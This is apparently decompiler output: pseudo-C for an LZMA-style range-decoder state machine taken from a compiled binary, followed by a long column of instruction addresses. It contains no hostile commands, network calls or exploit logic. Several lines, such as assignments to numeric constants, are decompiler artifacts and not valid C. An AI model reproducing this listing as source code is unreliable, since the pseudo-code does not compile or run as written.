                                                          												_t203 = __ebp - 0x70;
                                                          												 *_t203 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t203;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L60:
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													L55:
                                                          													__al =  *(__ebp - 0x44);
                                                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          													goto L56;
                                                          												}
                                                          												L61:
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__edx = __ebx + __ebx;
                                                          												__ecx =  *(__ebp - 0x10);
                                                          												__esi = __edx + __eax;
                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													_t217 = __edx + 1; // 0x1
                                                          													__ebx = _t217;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L60;
                                                          												} else {
                                                          													goto L58;
                                                          												}
                                                          											case 0x10:
                                                          												L109:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0x10;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t365 = __ebp - 0x70;
                                                          												 *_t365 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t365;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												goto L111;
                                                          											case 0x11:
                                                          												L68:
                                                          												_t614 =  *(_t621 - 0x58);
                                                          												 *(_t621 - 0x84) = 0x12;
                                                          												while(1) {
                                                          													L132:
                                                          													 *(_t621 - 0x54) = _t614;
                                                          													goto L133;
                                                          												}
                                                          											case 0x12:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 0x58);
                                                          													 *(__ebp - 0x84) = 0x13;
                                                          													__esi =  *(__ebp - 0x58) + 2;
                                                          													while(1) {
                                                          														L132:
                                                          														 *(_t621 - 0x54) = _t614;
                                                          														goto L133;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x4c);
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                          												__eflags = __eax;
                                                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          												goto L130;
                                                          											case 0x13:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													_t469 = __ebp - 0x58;
                                                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          													__eflags =  *_t469;
                                                          													 *(__ebp - 0x30) = 0x10;
                                                          													 *(__ebp - 0x40) = 8;
                                                          													L144:
                                                          													 *(__ebp - 0x7c) = 0x14;
                                                          													goto L145;
                                                          												}
                                                          												__eax =  *(__ebp - 0x4c);
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                          												 *(__ebp - 0x30) = 8;
                                                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          												L130:
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												 *(__ebp - 0x40) = 3;
                                                          												goto L144;
                                                          											case 0x14:
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          												__eax =  *(__ebp - 0x80);
                                                          												 *(_t621 - 0x88) = _t542;
                                                          												goto L1;
                                                          											case 0x15:
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          												__al = __al & 0x000000fd;
                                                          												__eax = (__eflags >= 0) - 1 + 0xb;
                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          												goto L120;
                                                          											case 0x16:
                                                          												__eax =  *(__ebp - 0x30);
                                                          												__eflags = __eax - 4;
                                                          												if(__eax >= 4) {
                                                          													_push(3);
                                                          													_pop(__eax);
                                                          												}
                                                          												__ecx =  *(__ebp - 4);
                                                          												 *(__ebp - 0x40) = 6;
                                                          												__eax = __eax << 7;
                                                          												 *(__ebp - 0x7c) = 0x19;
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												goto L145;
                                                          											case 0x17:
                                                          												L145:
                                                          												__eax =  *(__ebp - 0x40);
                                                          												 *(__ebp - 0x50) = 1;
                                                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          												goto L149;
                                                          											case 0x18:
                                                          												L146:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0x18;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t484 = __ebp - 0x70;
                                                          												 *_t484 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t484;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L148:
                                                          												_t487 = __ebp - 0x48;
                                                          												 *_t487 =  *(__ebp - 0x48) - 1;
                                                          												__eflags =  *_t487;
                                                          												L149:
                                                          												__eflags =  *(__ebp - 0x48);
                                                          												if( *(__ebp - 0x48) <= 0) {
                                                          													__ecx =  *(__ebp - 0x40);
                                                          													__ebx =  *(__ebp - 0x50);
                                                          													0 = 1;
                                                          													__eax = 1 << __cl;
                                                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          													__eax =  *(__ebp - 0x7c);
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													while(1) {
                                                          														 *(_t621 - 0x88) = _t542;
                                                          														goto L1;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x50);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__esi = __edx + __eax;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__ax =  *__esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													__cx = __ax >> 5;
                                                          													__eax = __eax - __ecx;
                                                          													__edx = __edx + 1;
                                                          													__eflags = __edx;
                                                          													 *__esi = __ax;
                                                          													 *(__ebp - 0x50) = __edx;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L148;
                                                          												} else {
                                                          													goto L146;
                                                          												}
                                                          											case 0x19:
                                                          												__eflags = __ebx - 4;
                                                          												if(__ebx < 4) {
                                                          													 *(__ebp - 0x2c) = __ebx;
                                                          													L119:
                                                          													_t393 = __ebp - 0x2c;
                                                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          													__eflags =  *_t393;
                                                          													L120:
                                                          													__eax =  *(__ebp - 0x2c);
                                                          													__eflags = __eax;
                                                          													if(__eax == 0) {
                                                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          														goto L170;
                                                          													}
                                                          													__eflags = __eax -  *(__ebp - 0x60);
                                                          													if(__eax >  *(__ebp - 0x60)) {
                                                          														goto L171;
                                                          													}
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          													__eax =  *(__ebp - 0x30);
                                                          													_t400 = __ebp - 0x60;
                                                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          													__eflags =  *_t400;
                                                          													goto L123;
                                                          												}
                                                          												__ecx = __ebx;
                                                          												__eax = __ebx;
                                                          												__ecx = __ebx >> 1;
                                                          												__eax = __ebx & 0x00000001;
                                                          												__ecx = (__ebx >> 1) - 1;
                                                          												__al = __al | 0x00000002;
                                                          												__eax = (__ebx & 0x00000001) << __cl;
                                                          												__eflags = __ebx - 0xe;
                                                          												 *(__ebp - 0x2c) = __eax;
                                                          												if(__ebx >= 0xe) {
                                                          													__ebx = 0;
                                                          													 *(__ebp - 0x48) = __ecx;
                                                          													L102:
                                                          													__eflags =  *(__ebp - 0x48);
                                                          													if( *(__ebp - 0x48) <= 0) {
                                                          														__eax = __eax + __ebx;
                                                          														 *(__ebp - 0x40) = 4;
                                                          														 *(__ebp - 0x2c) = __eax;
                                                          														__eax =  *(__ebp - 4);
                                                          														__eax =  *(__ebp - 4) + 0x644;
                                                          														__eflags = __eax;
                                                          														L108:
                                                          														__ebx = 0;
                                                          														 *(__ebp - 0x58) = __eax;
                                                          														 *(__ebp - 0x50) = 1;
                                                          														 *(__ebp - 0x44) = 0;
                                                          														 *(__ebp - 0x48) = 0;
                                                          														L112:
                                                          														__eax =  *(__ebp - 0x40);
                                                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          															_t391 = __ebp - 0x2c;
                                                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          															__eflags =  *_t391;
                                                          															goto L119;
                                                          														}
                                                          														__eax =  *(__ebp - 0x50);
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          														__eax =  *(__ebp - 0x58);
                                                          														__esi = __edi + __eax;
                                                          														 *(__ebp - 0x54) = __esi;
                                                          														__ax =  *__esi;
                                                          														__ecx = __ax & 0x0000ffff;
                                                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          														__eflags =  *(__ebp - 0xc) - __edx;
                                                          														if( *(__ebp - 0xc) >= __edx) {
                                                          															__ecx = 0;
                                                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          															__ecx = 1;
                                                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          															__ebx = 1;
                                                          															__ecx =  *(__ebp - 0x48);
                                                          															__ebx = 1 << __cl;
                                                          															__ecx = 1 << __cl;
                                                          															__ebx =  *(__ebp - 0x44);
                                                          															__ebx =  *(__ebp - 0x44) | __ecx;
                                                          															__cx = __ax;
                                                          															__cx = __ax >> 5;
                                                          															__eax = __eax - __ecx;
                                                          															__edi = __edi + 1;
                                                          															__eflags = __edi;
                                                          															 *(__ebp - 0x44) = __ebx;
                                                          															 *__esi = __ax;
                                                          															 *(__ebp - 0x50) = __edi;
                                                          														} else {
                                                          															 *(__ebp - 0x10) = __edx;
                                                          															0x800 = 0x800 - __ecx;
                                                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          															 *__esi = __dx;
                                                          														}
                                                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          														if( *(__ebp - 0x10) >= 0x1000000) {
                                                          															L111:
                                                          															_t368 = __ebp - 0x48;
                                                          															 *_t368 =  *(__ebp - 0x48) + 1;
                                                          															__eflags =  *_t368;
                                                          															goto L112;
                                                          														} else {
                                                          															goto L109;
                                                          														}
                                                          													}
                                                          													__ecx =  *(__ebp - 0xc);
                                                          													__ebx = __ebx + __ebx;
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          														__ecx =  *(__ebp - 0x10);
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          														__ebx = __ebx | 0x00000001;
                                                          														__eflags = __ebx;
                                                          														 *(__ebp - 0x44) = __ebx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														L101:
                                                          														_t338 = __ebp - 0x48;
                                                          														 *_t338 =  *(__ebp - 0x48) - 1;
                                                          														__eflags =  *_t338;
                                                          														goto L102;
                                                          													} else {
                                                          														goto L99;
                                                          													}
                                                          												}
                                                          												__edx =  *(__ebp - 4);
                                                          												__eax = __eax - __ebx;
                                                          												 *(__ebp - 0x40) = __ecx;
                                                          												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          												goto L108;
                                                          											case 0x1a:
                                                          												L56:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													 *(__ebp - 0x88) = 0x1a;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x68);
                                                          												__al =  *(__ebp - 0x5c);
                                                          												__edx =  *(__ebp - 8);
                                                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          												 *( *(__ebp - 0x68)) = __al;
                                                          												__ecx =  *(__ebp - 0x14);
                                                          												 *(__ecx +  *(__ebp - 8)) = __al;
                                                          												__eax = __ecx + 1;
                                                          												__edx = 0;
                                                          												_t192 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t192;
                                                          												goto L79;
                                                          											case 0x1b:
                                                          												L75:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													 *(__ebp - 0x88) = 0x1b;
                                                          													goto L170;
                                                          												}
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__edx =  *(__ebp - 8);
                                                          												__cl =  *(__eax + __edx);
                                                          												__eax =  *(__ebp - 0x14);
                                                          												 *(__ebp - 0x5c) = __cl;
                                                          												 *(__eax + __edx) = __cl;
                                                          												__eax = __eax + 1;
                                                          												__edx = 0;
                                                          												_t274 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t274;
                                                          												__eax =  *(__ebp - 0x68);
                                                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												_t283 = __ebp - 0x64;
                                                          												 *_t283 =  *(__ebp - 0x64) - 1;
                                                          												__eflags =  *_t283;
                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                          												L79:
                                                          												 *(__ebp - 0x14) = __edx;
                                                          												goto L80;
                                                          											case 0x1c:
                                                          												while(1) {
                                                          													L123:
                                                          													__eflags =  *(__ebp - 0x64);
                                                          													if( *(__ebp - 0x64) == 0) {
                                                          														break;
                                                          													}
                                                          													__eax =  *(__ebp - 0x14);
                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                          														__eflags = __eax;
                                                          													}
                                                          													__edx =  *(__ebp - 8);
                                                          													__cl =  *(__eax + __edx);
                                                          													__eax =  *(__ebp - 0x14);
                                                          													 *(__ebp - 0x5c) = __cl;
                                                          													 *(__eax + __edx) = __cl;
                                                          													__eax = __eax + 1;
                                                          													__edx = 0;
                                                          													_t414 = __eax %  *(__ebp - 0x74);
                                                          													__eax = __eax /  *(__ebp - 0x74);
                                                          													__edx = _t414;
                                                          													__eax =  *(__ebp - 0x68);
                                                          													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          													__eflags =  *(__ebp - 0x30);
                                                          													 *( *(__ebp - 0x68)) = __cl;
                                                          													 *(__ebp - 0x14) = _t414;
                                                          													if( *(__ebp - 0x30) > 0) {
                                                          														continue;
                                                          													} else {
                                                          														L80:
                                                          														 *(__ebp - 0x88) = 2;
                                                          														goto L1;
                                                          													}
                                                          												}
                                                          												 *(__ebp - 0x88) = 0x1c;
                                                          												goto L170;
                                                          										}
                                                          									}
                                                          									L171:
                                                          									_t544 = _t543 | 0xffffffff;
                                                          									goto L172;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					goto L1;
                                                          				}
                                                          			}














                                                          0x00000000
                                                          0x00406ffe
                                                          0x00406ffe
                                                          0x00407002
                                                          0x00407023
                                                          0x0040702a
                                                          0x00407030
                                                          0x00407036
                                                          0x00407048
                                                          0x0040704e
                                                          0x00407053
                                                          0x00000000
                                                          0x00407004
                                                          0x0040700a
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040741c
                                                          0x00407420
                                                          0x004075cf
                                                          0x004075e5
                                                          0x004075ed
                                                          0x004075f4
                                                          0x004075f6
                                                          0x004075fd
                                                          0x00407601
                                                          0x00407601
                                                          0x0040742c
                                                          0x00407433
                                                          0x0040743b
                                                          0x0040743e
                                                          0x00407441
                                                          0x00407441
                                                          0x00407447
                                                          0x00407447
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406bec
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x00000000
                                                          0x00406bfd
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c06
                                                          0x00406c09
                                                          0x00406c0c
                                                          0x00406c10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c16
                                                          0x00406c19
                                                          0x00406c1b
                                                          0x00406c1c
                                                          0x00406c1f
                                                          0x00406c21
                                                          0x00406c22
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2c
                                                          0x00406c31
                                                          0x00406c3a
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406c5c
                                                          0x00406c84
                                                          0x00406c86
                                                          0x00406c94
                                                          0x00406c94
                                                          0x00406c98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c88
                                                          0x00406c8b
                                                          0x00406c8c
                                                          0x00406c8c
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c62
                                                          0x00406c67
                                                          0x00406c67
                                                          0x00406c70
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00000000
                                                          0x00406c81
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c9e
                                                          0x00406c9e
                                                          0x00406ca2
                                                          0x0040754e
                                                          0x00000000
                                                          0x0040754e
                                                          0x00406cab
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc4
                                                          0x00406cc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cca
                                                          0x00406cd0
                                                          0x00406cfa
                                                          0x00406d00
                                                          0x00406d07
                                                          0x00000000
                                                          0x00406d07
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cde
                                                          0x00406cde
                                                          0x00406ce9
                                                          0x00406cf1
                                                          0x00406cf4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d39
                                                          0x00406d3f
                                                          0x00406d42
                                                          0x00406d4f
                                                          0x00406d57
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0e
                                                          0x00406d0e
                                                          0x00406d12
                                                          0x0040755d
                                                          0x00000000
                                                          0x0040755d
                                                          0x00406d1e
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d37
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d5f
                                                          0x00406d61
                                                          0x00406d64
                                                          0x00406dd5
                                                          0x00406dd8
                                                          0x00406ddb
                                                          0x00406de2
                                                          0x00406dec
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x00406d66
                                                          0x00406d6a
                                                          0x00406d6d
                                                          0x00406d6f
                                                          0x00406d72
                                                          0x00406d75
                                                          0x00406d77
                                                          0x00406d7a
                                                          0x00406d7c
                                                          0x00406d81
                                                          0x00406d84
                                                          0x00406d87
                                                          0x00406d8b
                                                          0x00406d92
                                                          0x00406d95
                                                          0x00406d9c
                                                          0x00406da0
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406dac
                                                          0x00406daf
                                                          0x00406dcd
                                                          0x00406dcf
                                                          0x00000000
                                                          0x00406db1
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406db7
                                                          0x00406dba
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbf
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc5
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407068
                                                          0x0040706c
                                                          0x0040708f
                                                          0x00407092
                                                          0x00407095
                                                          0x0040709f
                                                          0x0040706e
                                                          0x0040706e
                                                          0x00407071
                                                          0x00407074
                                                          0x00407077
                                                          0x00407084
                                                          0x00407087
                                                          0x00407087
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x00000000
                                                          0x004070ab
                                                          0x004070af
                                                          0x00000000
                                                          0x00000000
                                                          0x004070b5
                                                          0x004070b9
                                                          0x00000000
                                                          0x00000000
                                                          0x004070bf
                                                          0x004070c1
                                                          0x004070c5
                                                          0x004070c5
                                                          0x004070c8
                                                          0x004070cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040711c
                                                          0x00407120
                                                          0x00407127
                                                          0x0040712a
                                                          0x0040712d
                                                          0x00407137
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00407122
                                                          0x00000000
                                                          0x00000000
                                                          0x00407143
                                                          0x00407147
                                                          0x0040714e
                                                          0x00407151
                                                          0x00407154
                                                          0x00407149
                                                          0x00407149
                                                          0x00407149
                                                          0x00407157
                                                          0x0040715a
                                                          0x0040715d
                                                          0x0040715d
                                                          0x00407160
                                                          0x00407163
                                                          0x00407166
                                                          0x00407166
                                                          0x00407169
                                                          0x00407170
                                                          0x00407175
                                                          0x00000000
                                                          0x00000000
                                                          0x00407203
                                                          0x00407203
                                                          0x00407207
                                                          0x004075a5
                                                          0x00000000
                                                          0x004075a5
                                                          0x0040720d
                                                          0x00407210
                                                          0x00407213
                                                          0x00407217
                                                          0x0040721a
                                                          0x00407220
                                                          0x00407222
                                                          0x00407222
                                                          0x00407222
                                                          0x00407225
                                                          0x00407228
                                                          0x00000000
                                                          0x00000000
                                                          0x00406df8
                                                          0x00406df8
                                                          0x00406dfc
                                                          0x00407569
                                                          0x00000000
                                                          0x00407569
                                                          0x00406e02
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0c
                                                          0x00406e0f
                                                          0x00406e15
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e1a
                                                          0x00406e1d
                                                          0x00406e1d
                                                          0x00406e20
                                                          0x00406e23
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e29
                                                          0x00406e2f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e35
                                                          0x00406e35
                                                          0x00406e39
                                                          0x00406e3c
                                                          0x00406e3f
                                                          0x00406e42
                                                          0x00406e45
                                                          0x00406e46
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e51
                                                          0x00406e54
                                                          0x00406e57
                                                          0x00406e5a
                                                          0x00406e5d
                                                          0x00406e60
                                                          0x00406e63
                                                          0x00406e7f
                                                          0x00406e82
                                                          0x00406e85
                                                          0x00406e88
                                                          0x00406e8f
                                                          0x00406e93
                                                          0x00406e95
                                                          0x00406e99
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00406e69
                                                          0x00406e71
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406e9c
                                                          0x00406ea3
                                                          0x00406ea6
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eb1
                                                          0x00406eb1
                                                          0x00406eb5
                                                          0x00407575
                                                          0x00000000
                                                          0x00407575
                                                          0x00406ebb
                                                          0x00406ebe
                                                          0x00406ec1
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ece
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed3
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406edc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ede
                                                          0x00406ee1
                                                          0x00406ee4
                                                          0x00406ee7
                                                          0x00406eea
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef3
                                                          0x00406ef6
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1d
                                                          0x00406f1d
                                                          0x00406f20
                                                          0x00406f24
                                                          0x00406f26
                                                          0x00406efe
                                                          0x00406efe
                                                          0x00406f06
                                                          0x00406f0b
                                                          0x00406f0d
                                                          0x00406f0f
                                                          0x00406f0f
                                                          0x00406f29
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00406f35
                                                          0x00000000
                                                          0x00406f35
                                                          0x00406f33
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f75
                                                          0x00406f75
                                                          0x00406f79
                                                          0x00407581
                                                          0x00000000
                                                          0x00407581
                                                          0x00406f7f
